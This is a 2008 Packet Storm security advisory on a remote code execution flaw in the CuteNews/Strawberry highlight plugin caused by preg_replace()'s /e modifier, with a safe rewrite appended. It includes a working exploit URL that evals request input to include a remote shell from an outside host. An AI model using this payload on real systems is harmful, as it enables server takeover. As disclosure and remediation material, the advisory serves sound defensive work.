cutenews-exec.txt

2008-01-07T00:00:00
ID PACKETSTORM:62347
Type packetstorm
Reporter Eugene Minaev
Modified 2008-01-07T00:00:00

Description

                                        
                                            `----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]  
  
Strawberry (CuteNews) Remote Code Execution  
Eugene Minaev underwater@itdefence.ru  
-[ ITDEFENCE.ru Security advisory, 2007 ]-
  
preg_replace() with the 'e' modifier allows code execution. With /e the
replacement argument is evaluated as PHP code after the captured group "$1"
has been substituted into it as text, so a comment body taken from the
request lands inside the evaluated string. The affected code
(strawberry/plugins/wacko/highlight/html.php; $text and $options are set
earlier in that file):

<?php

$source = htmlspecialchars($text);

// The 'e' flag makes preg_replace() eval() the replacement string; "$1"
// (the comment body, controlled by the request) is spliced into it first.
$source = preg_replace(
    '/<!--(.*?)-->/es',
    '"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
        str_replace("<","<<!-- -->",
        str_replace("=","=<!-- -->",
        "$1")).
    "--></span>"',
    $source);

?>
  
strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');  
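As an added example (not code from the CuteNews/Strawberry project), the same highlighter rewritten with preg_replace_callback(), the standard replacement for the /e modifier: the captured comment body reaches a closure as an ordinary string and is never parsed as PHP. It assumes $options has the shape the original snippet reads and, so that it runs on raw input, matches the entity-escaped comment delimiters that htmlspecialchars() produces.

```php
<?php
// Added example, not CuteNews/Strawberry code: comment highlighting without /e.
// The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0; the callback
// form takes the match as a runtime value, so nothing in it is eval()'d.
// Assumptions: $options['color']['comment'] as in the original snippet, and the
// pattern matches the "&lt;!-- ... --&gt;" that htmlspecialchars() produces.

function highlight_comments(string $text, array $options): string
{
    $source = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    // The colour comes from configuration rather than the request, but it is
    // still emitted as data, not markup.
    $color = htmlspecialchars($options['color']['comment'] ?? '#888888', ENT_QUOTES, 'UTF-8');

    return preg_replace_callback(
        '/&lt;!--(.*?)--&gt;/s',
        function (array $m) use ($color): string {
            // Same obfuscation of the comment body as the original, done in one
            // pass with strtr(); "{$...}" or "${...}" in $m[1] is just text here.
            $body = strtr($m[1], ['=' => '=<!-- -->', '<' => '<<!-- -->']);
            return '<span style="color: ' . $color . ';">&lt;!--' . $body . '--&gt;</span>';
        },
        $source
    );
}

// Constructed input: a comment whose body uses PHP string-interpolation syntax.
// Under /e that text would have been spliced into PHP source before eval();
// here it comes back unchanged apart from the highlighting markup.
$sample  = 'line1 <!-- mode=debug {$not_code} --> line2';
$options = ['color' => ['comment' => '#808080']];
echo highlight_comments($sample, $options), "\n";
```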
  
  
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]  
  